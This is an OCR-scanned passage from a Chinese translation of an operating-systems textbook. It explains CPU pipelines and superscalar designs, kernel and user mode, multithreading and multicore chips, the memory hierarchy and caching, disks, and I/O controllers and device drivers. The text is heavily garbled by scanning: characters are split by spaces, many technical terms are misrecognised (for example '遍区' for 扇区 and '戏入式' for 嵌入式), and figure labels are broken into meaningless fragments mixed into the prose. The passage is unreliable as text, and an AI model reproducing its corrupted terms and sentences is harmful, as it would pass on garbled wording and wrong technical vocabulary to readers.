有 同时 取出 多 条 指令 的 机 制 。 例 如 ， 一 个 CPU 可 以 有 单独 的 取 指 单元 、 解 码 单元 和 执行 单元 ， 于 是 当 它 执 
行 指令 n 时 ， 还 可 以 对 指令 n + 1 解码 ， 并 且 读 取 指令 n + 2。 这 样 的 机 制 称 为 流水 线 (pipeline) ， 图 1-7a 
是 一 个 有 着 三 个 阶段 的 流水 线 示意 图 。 更 长 的 流水 线 也 是 常见 的 。 在 多 数 的 流水 线 设计 中 ， 一 旦 一 条 指令 
被 取 进 访 水 线 中 ， 它 就 必须 被 执行 完毕 ， 即 便 前 一 条 取出 的 指令 是 条 件 转移 ， 它 也 必须 被 执行 完毕 。 流 水 
线 使 得 编译 器 和 操作 系统 的 编写 者 很 头疼 ， 因 为 它 造成 了 在 机 器 中 实现 这 些 软件 的 复杂 性 问题 ， 而 机 器 必 
须 处 理 这 些 问题 。 


单元 单元 单元 


a) 





图 1-7 a) 有 三 个 阶段 的 流水 线 ，b) 一 个 超标 量 CPU 


比 流水 线 更 先进 的 设计 是 超标 量 CPU， 如 图 1-7b 所 示 。 在 这 种 设计 中 ， 有 多 个 执行 单元 ， 例 如 ， 一 
个 CPU 用 于 整数 算术 运算 ， 一 个 CPU 用 于 浮 点 算术 运算 ， 一 个 CPU 用 于 布尔 运算 。 两 个 或 更 多 的 指令 
被 同时 取出 、 解 码 并 装 入 暂 存 缓冲 区 中 ， 直 至 它们 执行 完毕 。 只 要 有 一 个 执行 单元 空间 ， 就 检查 保持 
缓冲 区 中 是 否 还 有 可 处 理 的 指令 ， 如 果 有 ， 就 把 指令 从 缓冲 区 中 移出 并 执行 之 。 这 种 设计 存在 一 种 隐 
含 的 作用 ， 即 程序 的 指令 经 常 不 按 顺 序 执行 。 在 多 数 情 况 下 ,硬件 负责 保证 这 种 运算 的 结果 与 顺序 执 
行 指令 时 的 结果 相同 但是， 仍然 有 部 分 令 人 烦恼 的 复杂 情形 被 强加 给 操作 系统 处 理 ， 我 们 在 后 面 会 
讨论 这 种 情况 。 
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除了 用 在 嵌入 式 系统 中 的 非常 简单 的 CPU 之 外 ， 多 数 CPU 都 有 两 种 模式 ， 即 前 面 已 经 提 及 的 内 核 
态 和 用 户 态 。 通 常 ， 在 PSW 中 有 一 个 二 进 制 位 控制 这 两 种 模式 。 当 在 内 核 态 运行 时 ，CPU 可 以 执行 指令 
集中 的 每 一 条 指令 ， 并 且 使 用 硬件 的 每 种 功能 。 在 台式 机 和 服务 器 上 ， 操 作 系统 在 内 核 态 下 运行 ， 从 而 
可 以 访问 整个 硬件 。 而 在 大 多 数 戏 入 式 系统 中 ， 一 部 分 操作 系统 运行 在 内 核 态 ， 其 余 的 部 分 则 运行 在 用 
户 态 。 

相反 ， 用 户 程 序 在 用 户 态 下 运行 ， 仅 允许 执行 整个 指令 集 的 一 个 子 集 和 访问 所 有 功能 的 一 个 子 集 。 
一 般 而 言 ， 在 用 户 态 中 有 关 L/O 和 内 存 保护 的 所 有 指令 是 禁止 的 。 当 然 ， 将 PSW 中 的 模式 位 设置 成 内 核 
态 也 是 禁止 的 。 

为 了 从 操作 系统 中 获得 服务 ， 用 户 程序 必须 使 用 系统 调用 (system call) 以 陷入 内 核 并 调用 操作 系 
统 。TRAP 指 令 把 用 户 态 切换 成 内 核 态 ， 并 启用 操作 系统 。 当 有 关 工 作 完成 之 后 ， 在 系统 调用 后 面 的 指 
令 把 控制 权 返 回 给 用 户 程序 。 在 本 章 的 后 面 我 们 将 具体 解释 系统 调用 过 程 ， 但 是 在 这 里 ， 请 读者 把 它 看 
成 是 一 个 特别 的 过 程 调 用 指令 ， 该 指令 具有 从 用 户 态 切换 到 内 核 态 的 特别 能 力 。 

有 必要 指出 的 是 ， 计 算 机 使 用 陷阱 而 不 是 一 条 指令 来 执行 系统 调用 。 其 他 的 多 数 陷阱 是 由 硬件 引起 
的 ， 用 于 警告 有 异常 情况 发 生 ， 如 试图 被 零 除 或 浮 点 下 游 等。 在 所 有 的 情况 下 ， 操 作 系 统 都 得 到 控制 权 
并 决定 如 何 处 理 异 常情 况 。 有 时， 由 于 出 错 的 原因 ， 程 序 不 得 不 停止 。 在 其 他 情况 下 可 以 忽略 出 错 (如 
下 溢 数 可 以 被 置 为 零 ) 。 最 后 ， 若 程序 已 经 提前 宣布 它 希望 处 理 某 类 条 件 ， 那 么 控制 权 还 必须 返回 给 该 
程序 ， 让 其 处 理 相 关 的 问题 。 

多 线程 和 多 核 芯片 

Moore 定律 指出 ,芯片 中 晶体 管 的 数量 每 18 个 月 翻 一 番 。 这 个 “定律 ”并 不 是 物理 学 上 的 某 种 规律 ， 
诸如 动量 守恒 定律 等 ， 它 是 Intel 公 司 的 共同 创始 人 Gordon Moore 对 半导体 公司 快速 缩小 晶体 管 能 力 上 
的 一 个 观察 结果 。Moore 定 律 已 经 保持 了 30 年 ， 有 希望 至 少 再 保持 10 年 。 在 那 以 后 ， 每 个 晶体 管 中 原 子 
的 数目 会 变 得 太 少 ， 并 且 量 子 力学 将 扮演 重要 角色 ， 这 将 阻止 晶体 管 尺寸 的 进一步 缩小 。 

使 用 大 量 的 晶体 管 引发 了 一 个 问题 : 如 何 处 理 它 们 呢 ? 这 里 我 们 可 以 看 到 一 种 处 理 方式 : 具有 多 个 
功能 部 件 的 超标 量 体 系 结 构 。 但 是 ， 随 着 晶体 管 数量 的 增加 ， 再 多 晶体 管 也 是 可 能 的 。 一 个 由 此 而 来 的 
必然 结果 是 ， 在 CPU 芯片 中 加 入 了 更 大 的 缓存 ， 人 们 肯定 会 这 样 做 ， 然 而 ， 原 先 获 得 的 有 用 效果 将 最 终 
消失 。 

显然 ， 下 一 步 不 仅 是 有 多 个 功能 部 件 ， 某 些 控制 逻辑 也 会 出 现 多 个 。Intel Pentium 4 引入 了 被 称 为 
多 线程 (multithreading) 或 超 线程 (hyperthreading， 这 是 Intel 公 司 的 命名 ) 的 特性 ，x86 处 理 器 和 其 他 
一 些 CPU 芯 片 就 是 这 样 做 的 ， 包 括 SPARC、Power5、Intel Xeon 和 Intel Core 系 列 。 近 似 地 说 ， 多 线程 允 
许 CPU 保 持 两 个 不 同 的 线程 状态 ， 然 后 在 纳 秒 级 的 时 间 尺 度 内 来 回 切 换 。( 线 程 是 一 种 轻 量 级 进程 ， 即 
一 个 运行 中 的 程序 。 我 们 将 在 第 2 章 中 具体 讨论 。) 例如 ， 如 果 某 个 进程 需要 从 内 存 中 读 出 一 个 字 (需要 
花费 多 个 时 钟 周期 )， 多 线程 CPU 则 可 以 切换 至 另 一 个 线程 。 多 线程 不 提供 真正 的 并 行 处 理 。 在 一 个 时 


刻 只 有 一 个 进程 在 运行 ， 但 是 线程 的 切换 时 间 则 减少 到 纳 秒 数量 级 。 
多 线程 对 操作 系统 而 言 是 有 意义 的 ， 因 为 每 个 LE 
缓存 核 2 
t2j t2] 
除了 多 线程 ， 还 出 现 了 包含 2 个 或 4 个 完整 处 理 ”一 -一 ae 
器 或 内 核 的 CPU 芯片 。 图 1-8 中 的 多 核 芯片 上 有 效 地 a) b) 


线程 在 操作 系统 看 来 就 像 是 单个 的 CPU。 考 虑 一 个 
实际 有 两 个 CPU 的 系统 ， 每 个 CPU 有 两 个 线程 。 这 
样 操作 系统 将 把 它 看 成 是 4 个 CPU。 如 果 在 某 个 特定 
时 间 点 上 ， 只 有 能 够 维持 两 个 CPU 忙碌 的 工作 量 ， 
那么 在 同一 个 CPU 上 调度 两 个 线程 ， 而 让 另 一 个 
CPU 完全 空转 ， 就 没有 优势 了 。 这 种 选择 远 远 不 如 
装 有 4 个 小 芯片 ， 每 个 小 芯片 都 是 一 个 独立 的 CPU 图 1-8 a) 带 有 共享 L2 缓 存 的 4 核 芯片 ， 
(后 面 将 解释 缓存 ) Intel Xeon Phi 和 Tilera TilePro 等 b) 带 有 分 离 L2 缓 存 的 4 核 芯片 


在 每 个 CPU 上 运行 一 个 线程 的 效率 高 。 
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处 理 器 ， 已 经 炫 技 般 地 在 一 枚 芯片 上 集成 了 60 多 个 核 。 要 使 用 这 类 多 核 芯片 肯定 需要 多 处 理 器 操作 系统 。 

其 实在 绝对 数目 方面 ， 没 什么 能 赢 过 现代 的 GPU (Graphics Processing Unit) 。GPU 指 的 是 由 成 千 
上 万 个 微 核 组 成 的 处 理 器 。 它 们 擅长 处 理 大 量 并 行 的 简单 计算 ， 比 如 在 图 像 应 用 中 这 染 多 边 形 。 它 们 不 
太 能 胜任 串 行 任务 ， 并 且 很 难 编 程 。 虽 然 GPU 对 操作 系统 很 有 用 〈 比 如 加 密 或 者 处 理 网 络 传输 ) ， 但 操 
作 系 统 本 身 不 太 可 能 运行 在 GPU 上 。 


1.3.2 存储 器 

在 任何 一 种 计算 机 中 ， 第 二 种 主要 部 件 都 是 存储 器 。 在 理想 情形 下 ， 存 储 器 应 该 极为 迅速 ( 快 于 执 
行 一 条 指令 ， 这 样 CPU 不 会 受到 存储 器 的 

典型 的 访问 时 间 

限制 ) ， 充 分 大 ， 并 且 非 常 便宜 。 但 是 目 ‘aa pestis 
前 的 技术 无 法 同时 满足 这 三 个 目标 ， 于 是 2ns 4MB 
出 现 了 不 同 的 处 理 方式 。 存 储 器 系统 采用 10ns 18GB 
一 种 分 层次 的 结构 ， 如 图 1-9 所 示 。 顶 层 的 10ms 1~4TB 





存储 器 速度 较 高 ， 容 量 较 小 ， 与 底层 的 存 
储 器 相 比 每 位 成 本 较 高 ， 其 差别 往往 是 十 
亿 数 量 级 。 

存储 器 系统 的 顶层 是 CPU 中 的 寄存 器 。 它 们 用 与 CPU 相 同 的 材料 制 成 ， 所 以 和 CPU 一 样 快 。 显 然 ， 
访问 它们 是 没有 时 延 的 。 其 典型 的 存储 容量 是 ， 在 32 位 CPU 中 为 32 x 32 位 ,而 在 64 位 CPU 中 为 64 x 64 
位 。 在 这 两 种 情形 下 ， 其 存储 容量 都 小 于 1 KB。 程 序 必须 在 软件 中 自行 管理 这 些 寄 存 器 ( 即 决 定 如 何 使 
用 它们 )。 

下 一 层 是 高 速 缓存 ， 它 多 数 由 硬件 控制 。 主 存 被 分 割 成 高 速 缓存 行 (cache line) ， 其 典型 大 小 为 64 
字 节 ， 地 址 0 至 63 对 应 高 速 缓存 行 0， 地 址 64 至 127 对 应 高 速 缓存 行 1， 以 此 类 推 。 最 常用 的 高 速 缓存 行 放 
置 在 CPU 内 部 或 者 非常 接近 CPU 的 高 速 缓存 中 。 当 某 个 程序 需要 读 一 个 存储 字 时 ， 高 速 缓存 硬件 检查 所 
需要 的 高 速 缓存 行 是 否 在 高 速 缓存 中 。 如 果 是 ， 称 为 高 速 缓存 命中 ， 缓 存 满足 了 请 求 ， 就 不 需要 通过 总 
线 把 访问 请 求 送 往 主 存 。 高 速 缓存 命中 通常 需要 两 个 时 钟 周期 。 高 速 缓存 未 命中 就 必须 访问 内 存 ， 这 要 
付出 大 量 的 时 间 代 价 。 由 于 高 速 缓存 的 价格 昂贵 ， 所 以 其 大 小 有 限 。 有 些 机 器 具有 两 级 甚至 三 级 高 速 缓 
存 ， 每 一 级 高 速 缓存 比 前 一 级 慢 且 容量 更 大 。 

缓存 在 计算 机 科学 的 许多 领域 中 起 着 重要 的 作用 ， 并 不 仅仅 是 RAM 的 缓存 行 。 只 要 存在 大 量 的 资 
源 可 以 划分 为 小 的 部 分 ， 那 么 ， 这 些 资源 中 的 某 些 部 分 就 会 比 其 他 部 分 更 频繁 地 得 到 使 用 ， 通 常 缓存 的 
使 用 会 带 来 性 能 上 的 改善 。 操 作 系统 一 直 在 使 用 缓存 。 例 如 ， 多 数 操作 系统 在 内 存 中 保留 频繁 使 用 的 文 
件 (的 一 部 分 ) ， 以 避免 从 磁盘 中 重复 地 调 取 这 些 文件 。 相 似 地 ， 类 似 于 
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的 长 路 径 名 转换 成 文件 所 在 的 磁盘 地 址 的 结果 ， 也 可 以 放 入 缓存 ， 以 避免 重复 寻找 地 址 。 还 有 ， 当 一 个 
Web 页 面 (URL) 的 地 址 转换 为 网 络 地 址 (IP 地 址 ) 后 ， 这 个 转换 结果 也 可 以 缓存 起 来 供 将 来 使 用 。 还 
有 许多 其 他 的 类 似 应 用 。 

在 任何 缓存 系统 中 ， 都 有 若干 需要 尽快 考虑 的 问题 ， 包 括 : 

1) 何 时 把 一 个 新 的 内 容 放 入 缓存 。 

2) 把 新 内 容 放 在 缓存 的 哪 一 行 上 。 

3) 在 需要 时 ， 应 该 把 哪个 内 容 从 缓存 中 移 走 。 

4) 应 该 把 新 移 走 的 内 容 放 在 某 个 较 大 存储 器 的 何 处 。 
并 不 是 每 个 问题 的 解决 方案 都 符合 每 种 缓存 处 理 。 对 于 CPU 缓存 中 的 主 存 缓存 行 ， 每 当 有 缓存 未 命中 时 ， 
就 会 调和 新 的 内 容 。 通 常 通过 所 引用 内 存 地 址 的 高 位 计算 应 该 使 用 的 缓存 行 。 例 如 ， 对 于 64 字 节 的 4096 个 
缓存 行 以 及 32 位 地 址 ， 其 中 6~ 17 位 用 来 定位 缓存 行 ， 而 0 一 5 位 则 用 来 确定 缓存 行 中 的 字 节 。 在 这 个 例子 
中 ， 被 移 走 内 容 的 位 置 就 是 新 数据 要 进入 的 位 置 ， 但 是 在 有 的 系统 中 未 必 是 这 样 。 最 后 ， 当 将 一 个 缓存 行 
的 内 容重 写 进 主 存 时 (该 内 容 被 缓存 后 ， 可 能 会 被 修改 )， 通 过 该 地 址 来 唯一 确定 需 重 写 的 主 存 位 置 。 

缓存 是 一 种 好 方法 ， 所 以 现代 CPU 中 设计 了 两 个 缓存 。 第 一 级 或 称 为 L1 缓 存 总 是 在 CPU 中 ， 通常 


图 1-9 典型 的 存储 层次 结构 ， 图 中 的 数据 是 非常 粗略 的 估计 
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用 来 将 已 解码 的 指令 调和 人 CPU 的 执行 引擎 。 对 于 那些 频繁 使 用 的 数据 字 ,， 多 数 芯 片 安排 有 第 二 个 L1 缓 存 。 
典型 的 L1 缓 存 大 小 为 16KB 。 另 外 ， 往 往 还 设计 有 二 级 缓存 ， 称 为 L2 缓 存 ， 用 来 存放 近来 使 用 过 的 若干 
兆 字 节 的 内 存 字 。L1 和 L2 缓 存 之 间 的 差别 在 于 时 序 。 对 LI1 缓 存 的 访问 ， 不 存在 任何 延 时 ， 而 对 L2 缓 存 
的 访问 ， 则 会 延 时 1 或 2 个 时 钟 周期 。 

在 多 核 芯 片 中 ， 设 计 师 必须 确定 缓存 的 位 置 。 在 图 1-8a 中 ， 一 个 L2 缓 存 被 所 有 的 核 共 享 。Intel 多 核 
芯片 采用 了 这 个 方法 。 相 反 ， 在 图 1-8b 中 ， 每 个 核 有 自己 的 L2 缓 存 。AMD 采 用 这 个 方法 。 不 过 每 种 策 
略 都 有 自己 的 优 缺 点 。 例 如 ，Intel 的 共享 L2 缓 存 需要 有 一 种 更 复杂 的 缓存 控制 器 ， 而 AMD 的 方式 在 设 
法 保持 L2 缓 存 一 致 性 上 存在 困难 。 

在 图 1-9 的 层次 结构 中 ， 再 往 下 一 层 是 主 存 。 这 是 存储 器 系统 的 主力 。 主 存 通常 称 为 随机 访问 存储 
器 (Random Access Memory，RAM) 。 过 去 有 时 称 之 为 磁 芯 存储 器 ， 因 为 在 20 世 纪 50 年 代 和 60 年 代 ， 使 
用 很 小 的 可 磁化 的 铁 磁体 制作 主 存 。 虽 然 它们 已 经 绝迹 了 很 多 年 ， 但 名 称 还 是 传承 了 下 来 。 目 前 ， 存 储 
器 的 容量 在 几 百 兆 字 节 到 若干 吉 字 节 之 间 ， 并 且 其 容量 正在 迅速 增长 。 所 有 不 能 在 高 速 缓存 中 得 到 满足 
的 访问 请 求 都 会 转 往 主 存 。 

除了 主 存 之 外 ， 许 多 计算 机 已 经 在 使 用 少量 的 非 易 失 性 随机 访问 存储 器 。 它 们 与 RAM 不 同 ， 在 电 
源 切 断 之 后 ， 非 易 失 性 随机 访问 存储 器 并 不 丢失 其 内 容 。 只 读 存储 器 (Read Only Memory，ROM) 在 
工厂 中 就 被 编程 完毕 ， 然 后 再 也 不 能 被 修改 。ROM 速 度 快 且 便宜 。 在 有 些 计算 机 中 ， 用 于 启动 计算 机 
的 引导 加 载 模块 就 存放 在 ROM 中 。 另 外 ， 一 些 IO 卡 也 采用 ROM 处 理 底 层 设 备 控制 。 

EEPROM (Electrically Erasable PROM， 电 可 接 除 可 编程 ROM) 和 闪存 (flash memory) 也 是 非 
易 失 性 的 ， 但 是 与 ROM 相 反 ， 它 们 可 以 擦 除 和 重 写 。 不 过 重 写 它们 需要 比 写 入 RAM 更 高 数量 级 的 时 间 ， 
所 以 它们 的 使 用 方式 与 ROM 相 同 ， 而 其 与 众 不 同 的 特点 使 它们 有 可 能 通过 字段 重 写 的 方式 纠正 所 保存 
程序 中 的 错误 。 

在 便携 式 电子 设备 中 ， 闪 存 通常 作为 存储 媒介 。 内 存 是 数码 相机 中 的 胶卷 ， 是 便携 式 音 乐 播放 器 的 
磁盘 ， 这 仅仅 是 闪存 用 途中 的 两 项 。 内 存在 速度 上 介 于 RAM 和 磁盘 之 间 。 另 外 ， 与 磁盘 存储 器 不 同 ， 
如 果 内 存 擦 除 的 次 数 过 多 ， 就 被 磨损 了 。 

还 有 一 类 存储 器 是 CMOS， 它 是 易 失 性 的 。 许 多 计算 机 利用 CMOS 存 储 器 保持 当前 时 间 和 日 期 。 
CMOS 存 储 器 和 递增 时 间 的 时 钟 电路 由 一 块 小 电池 驱动 ， 所 以 ， 即 使 计算 机 没有 上 电 ， 时 间 也 仍然 可 以 
正确 地 更 新 。CMOS 存 储 器 还 可 以 保存 配置 参数 ， 如 哪 一 个 是 启动 磁盘 等 。 之 所 以 采用 CMOS 是 因为 它 
消耗 的 电能 非常 少 ， 一块 工厂 原装 的 电池 往往 能 使 用 若干 年 。 但 是 ， 当 电池 开始 失效 时 ， 计 算 机 就 会 出 
现 “Alzheimer 病 症 ”9 一 一 计算 机 会 忘掉 记忆 多 年 的 事物 ， 比 如 应 该 由 哪个 磁盘 启动 等 。 


1.3.3 磁盘 

下 一 个 层次 是 磁盘 (硬盘 ) 。 磁 盘 同 RAM 相 比 ， 
每 个 二 进 制 位 的 成 本 低 了 两 个 数量 级 ， 而 且 经 常 也 
有 两 个 数量 级 大 的 容量 。 磁 盘 唯一 的 问题 是 随机 访 
问 数 据 时 间 大 约 慢 了 三 个 数量 级 。 其 低速 的 原因 是 
因为 磁盘 是 一 种 机 械 装置 ， 如 图 1-10 所 示 。 

在 一 个 磁盘 中 有 一 个 或 多 个 金属 盘 片 ， 它 们 以 。。 各 m3 
5400rpm, 7200rpm, 10 800rpm 或 更 高 的 速度 旋转 。 从 


读 / 写 头 
(每 个 盘面 1 个 ) 





盘面 7 


边缘 开始 有 一 个 机 械 尼 悬 横 在 盘面 上 ， 这 类 似 于 老式 BM 
COAL TIO LHe. (ASTER 


一 系列 同心 圆 上 。 在 任意 一 个 给 定 劈 的 位 置 ， 每 个 磁 
头 可 以 读 取 一 段 环 形 区 域 ， 称 为 磁道 (track)。 把 一 个 
给 定 臂 的 位 置 上 的 所 有 磁道 合并 起 来 ， 组 成 了 一 个 柱 
面 (cylinder)。 


图 1-10 磁盘 驱动 器 的 构造 


O 一 种 病因 未 明 的 原 发 退行 性 大 脑 疾病 ，、 以 记忆 受 损 为 主要 特征 ， 是 老年 性 痴呆 中 最 常见 的 一 种 类 型 。 一 一 译 者 注 
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每 个 磁道 划分 为 若干 扇 区 ， 遍 区 的 典型 值 是 512 字 节 。 在 现代 磁盘 中 ， 较 外 部 的 柱 面 比较 内 部 的 柱 
面 有 更 多 的 扁 区 。 机 械 璧 从 一 个 柱 面 移 到 相 邻 的 柱 面 大 约 需 要 lms。 而 随机 移 到 一 个 柱 面 的 典型 时 间 为 
5ms 至 10ms， 其 具体 时 间 取决 于 驱动 器 。 一 旦 磁 臂 到 达 正 确 的 磁道 上 ， 驱 动 器 必须 等 待 所 需 的 扇 区 旋转 
到 磁头 之 下 ， 这 就 增加 了 Sms 至 10ms 的 时 延 ， 其 具体 延 时 取决 于 驱动 器 的 转速 。 一 旦 所 需要 的 扇 区 移 到 
磁头 之 下 ， 就 开始 读 写 ， 低 端 硬盘 的 速率 是 50MB/s， 而 高 速 磁盘 的 速率 是 160 MB/s, 

有 了 时， 你 会 听 到 人 们 在 谈论 一 些 实际 上 根本 不 是 磁盘 的 磁盘 ， 比 如 固态 硬盘 (Solid State Disk, 
SSD)。 固 态 硬盘 并 没有 可 以 移动 的 部 分 ， 外 形 也 不 像 唱片 那样 ， 并 且 数 据 是 存储 在 存储 器 (闪存 ) 中 
的 。 与 磁盘 唯一 的 相似 之 处 就 是 它 也 存储 了 大 量 即使 在 电源 关闭 时 也 不 会 丢失 的 数据 。 

许多 计算 机 支持 一 种 著名 的 虚拟 内 存 机 制 ， 这 将 在 第 3 章 中 讨论 。 这 种 机 制 使 得 期 望 运 行 大 于 物理 
内 存 的 程序 成 为 可 能 ， 其 方法 是 将 程序 放 在 磁盘 上 ， 而 将 主 存 作为 一 种 缓存 ， 用 来 保存 最 频繁 使 用 的 部 
分 程序 。 这 种 机 制 需要 快速 地 映像 内 存 地 址 ， 以 便 把 程序 生成 的 地 址 转换 为 有 关 字 节 在 RAM 中 的 物理 
地 址 。 这 种 映像 由 CPU 中 的 一 个 称 为 存储 器 管理 单元 (Memory Management Unit, MMU) 的 部 件 来 完 
成 ， 如 图 1-6 所 示 。 

缓存 和 MMU 的 出 现 对 系统 的 性 能 有 着 重要 的 影响 。 在 多 道 程序 系统 中 ， 从 一 个 程序 切换 到 另 一 个 
程序 ， 有 时 称 为 上 下 文 切换 (context switch), ， 有 必要 对 来 自 缓存 的 所 有 修改 过 的 块 进行 写 回 磁盘 操作 ， 
并 修改 MMU 中 的 映像 寄存 器 。 但 是 这 两 种 操作 的 代价 很 昂贵 ， 所 以 程序 员 努 力 避 免 使 用 这 些 操作 。 我 
们 稍 后 将 看 到 这 些 操作 产生 的 影响 。 


1.3.4 VOR 

CPU 和 存储 器 不 是 操作 系统 唯一 需要 管理 的 资源 。IO 设 备 也 与 操作 系统 有 密切 的 相互 影响 。 如 图 1-6 
所 示 ，1/O 设 备 一 般 包 括 两 个 部 分 : 设备 控制 器 和 设备 本 身 。 控 制 器 是 插 在 电路 板 上 的 一 块 芯片 或 一 组 世 
片 ， 这 块 电路 板 物理 地 控制 设备 。 它 从 操作 系统 接收 命令 ， 例 如 ， 从 设备 读数 据 ， 并 且 完 成 数据 的 处 理 。 

在 许多 情形 下 ， 对 这 些 设备 的 控制 是 非常 复杂 和 具体 的 ， 所 以 ， 控 制 器 的 任务 是 为 操作 系统 提供 一 
个 简单 的 接口 (不 过 还 是 很 复杂 )。 例 如 ， 磁 盘 控 制 器 可 以 接受 一 个 命令 从 磁盘 2 读 出 11206 号 扇 区 ， 然 
后 ， 控 制 器 把 这 个 线性 遍 区 号 转化 为 柱 面 、 遍 区 和 磁头 。 由 于 外 柱 面 比 内 柱 面 有 较 多 的 遍 区 ， 而 且 一 些 
坏 遍 区 已 经 被 映射 到 磁盘 的 其 他 地 方 ， 所 以 这 种 转换 将 是 很 复杂 的 。 磁 盘 控 制 器 必须 确定 磁头 劈 应 该 在 
哪个 柱 面 上 ， 并 对 磁头 璧 发 出 指令 以 使 其 前 后 移动 到 所 要 求 的 柱 面 号 上 ， 接 着 必须 等 待 对 应 的 扇 区 转动 
到 磁头 下 面 并 开始 读 出 数据 ， 随 着 数据 从 驱动 器 读 出 ， 要 消去 引导 块 并 计算 校 验 和 。 最 后 ， 还 得 把 输入 
的 二 进 制 位 组 成 字 并 存放 到 存储 器 中 。 为 了 完成 这 些 工作 , 在 控制 器 中 经 常安 装 一 个 小 的 人 姓 入 式 计算 机 ， 
该 谋 入 式 计 算 机 运行 为 执行 这 些 工作 而 专门 编 好 的 程序 。 

IO 设备 的 另 一 个 部 分 是 实际 设备 的 自身 。 设 备 本 身 有 个 相对 简单 的 接口 ， 这 是 因为 接口 既 不 能 做 
很 多 工作 ， 又 已 经 被 标准 化 了 。 例 如 ， 标 准 化 后 任何 一 个 SATA 磁 盘 控制 器 就 可 以 适 配 任 一 种 SATA 磁 盘 ， 
所 以 标准 化 是 必要 的 。ATA 代 表 高 级 技术 附件 (AT Attachment) ， 而 SATA 表 示 串 行 高 级 技术 附件 
(Serial ATA ) 。 想 必 你 们 在 好 奇 AT 代 表 着 什么 ， 它 是 IBM 公 司 的 第 二 代 个 人 计算 机 高 级 技术 (Advanced 
Technology) ， 采 用 该 公司 于 1984 年 推出 的 6MHz 80286 处 理 器 ， 这 一 处 理 器 是 当年 最 为 强大 的 。 从 中 我 
们 可 以 看 出 ， 计 算 机 工业 有 着 不 断 用 新 的 前 组 或 后 绥 来 扩展 首 字 母 缩写 词 的 习惯 。 我 们 还 能 看 出 ， 像 
“高 级 ”这 样 的 形容 词 应 当 谨慎 使 用 ， 否 则 30 年 后 再 回首 时 会 显得 非常 思 昧 。 

现在 SATA 是 很 多 计算 机 的 标准 硬盘 接口 。 由 于 实际 的 设备 接口 隐藏 在 控制 器 中 ， 所 以 ， 操 作 系 统 
看 到 的 是 对 控制 器 的 接口 ， 这 个 接口 可 能 和 设备 接口 有 很 大 的 差别 。 

每 类 设备 控制 器 都 是 不 同 的 ， 所 以 ， 需 要 不 同 的 软件 进行 控制 。 -专门 与 控制 器 对 话 ， 发 出 命令 并 接收 
响应 的 软件 ， 称 为 设备 驱动 程序 (device driver) 。 每 个 控制 器 厂家 必须 为 所 支持 的 操作 系统 提供 相应 的 设备 
驱动 程序 。 例 如 ， 一 台 扫 描 仪 会 配 有 用 于 OS X、Windows 7、Windows 8 以 及 Linux 的 设备 驱动 程序 。 

为 了 能 够 使 用 设备 驱动 程序 ， 必 须 把 设备 驱动 程序 装 入 操作 系统 中 ， 这 样 它 可 在 核心 态 运 行 。 设 备 
驱动 程序 可 以 在 内 核 外 运行 ， 现代 的 Linux 和 Windows 操 作 系 统 也 的 确 对 这 种 方式 提供 一 些 支持 。 绝 大 
多 数 驱动 程序 仍然 需要 在 内 核 态 运行 。 只 有 很 少 一 部 分 现代 系统 (如 MINIX 3) 在 用 户 态 运行 全 部 驱动 
程序 。 在 用 户 态 运行 的 驱动 程序 必须 能 够 以 某 种 受 控 的 方式 访问 设备 ， 然 而 这 并 不 容易 。 
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要 将 设备 驱动 程序 装 和 操作 系统 ， 有 三 个 途径 。 第 一 个 途径 是 将 内 核 与 设备 驱动 程序 重新 链接 ， 然 
后 重启 动 系统 。 许 多 UNIX 系 统 以 这 种 方式 工作 。 第 二 个 途径 是 在 一 个 操作 系统 文件 中 设置 一 个 人 口 ， 
并 通知 该 文件 需要 一 个 设备 驱动 程序 ， 然 后 重启 动 系 统 。 在 系统 启动 时 ， 操 作 系统 去 找寻 所 需 的 设备 驱 
动 程序 并 装载 之 。Windows 就 是 以 这 种 方式 工作 。 第 三 种 途径 是 ， 操 作 系统 能 够 在 运行 时 接受 新 的 设备 
驱动 程序 并 且 立 即将 其 安装 好 ， 无 须 重启 动 系统 。 这 种 方式 采用 得 较 少 ， 但 是 正在 变 得 普及 起 来 。 热 插 
拔 设备 ， 诸 如 USB 和 IEEE 1394 设 备 (后 面 会 讨论 ) 都 需要 动态 可 装载 设备 驱动 程序 。 

每 个 设备 控制 器 都 有 少量 用 于 通信 的 寄存 器 。 例 如 ， 一 个 最 小 的 磁盘 控制 器 也 会 有 用 于 指定 磁盘 地 
址 、 内 存 地 址 、 遍 区 计数 和 方向 〈 读 或 写 ) 的 寄存 器 。 要 激活 控制 器 ,设备 驱动 程序 从 操作 系统 获得 一 
条 命令 ， 然 后 翻译 成 对 应 的 值 ， 并 写 进 设备 寄存 器 中 。 所 有 设备 寄存 器 的 集合 构成 了 IO 端口 空间 ， 我 
们 将 在 第 5 章 讨论 有 关内 容 。 

在 有 些 计算 机 中 ， 设 备 寄存 器 被 映射 到 操作 系统 的 地 址 空间 (操作 系统 可 使 用 的 地 址 )， 这 样 ， 它 
们 就 可 以 像 普通 存储 字 一 样 读 出 和 写 入 。 在 这 种 计算 机 中 ， 不 需要 专门 的 IO 指令 ， 用 户 程序 可 以 被 硬 
件 阻 挡 在 外 ， 防 止 其 接触 这 些 存储 器 地 址 〈 例 如 ， 采 用 基 址 和 界限 寄存 器 ) 。 在 另外 一 些 计 算 机 中 ， 设 
备 寄 存 器 被 放 和 一 个 专门 的 IO 端口 空间 中 ， 每 个 寄存 器 都 有 一 个 端口 地 址 。 在 这 些 机 器 中 ， 提 供 在 内 
核 态 中 可 使 用 的 专门 IN 和 OUT 指 令 ， 供 设备 驱动 程序 读 写 这 些 寄存 器 用 。 前 一 种 方式 不 需要 专门 的 MO 
指令 ， 但 是 占用 了 一 些 地 址 空间 。 后 者 不 占用 地 址 空间 ， 但 是 需要 专门 的 指令 。 这 两 种 方式 的 应 用 都 很 
最 = 学 

实现 输入 和 输出 的 方式 有 三 种 。 在 最 简单 的 方式 中 ， 用 户 程序 发 出 一 个 系统 调用 ， 内 核 将 其 翻译 成 
一 个 对 应 设备 驱动 程序 的 过 程 调 用 。 然 后 设备 驱动 程序 启动 IO 并 在 一 个 连续 不 断 的 循环 中 检查 该 设备 ， 
看 该 设备 是 否 完成 了 工作 (一 般 有 一 些 二 进 制 位 用 来 指示 设备 仍 在 忙碌 中 )。 当 LO 结束 后 ， 设 备 驱 动 程 
序 把 数据 送 到 指定 的 地 方 〈( 若 有 此 需要 ) ， 并 和 返回。 然后 操作 系统 将 控制 返回 给 调用 者 。 这 种 方式 称 为 
忙 等 待 (busy waiting), 其 缺点 是 要 占据 CPU，CPU 一 直 轮 询 设备 直到 对 应 的 MO 操作 完成 。 

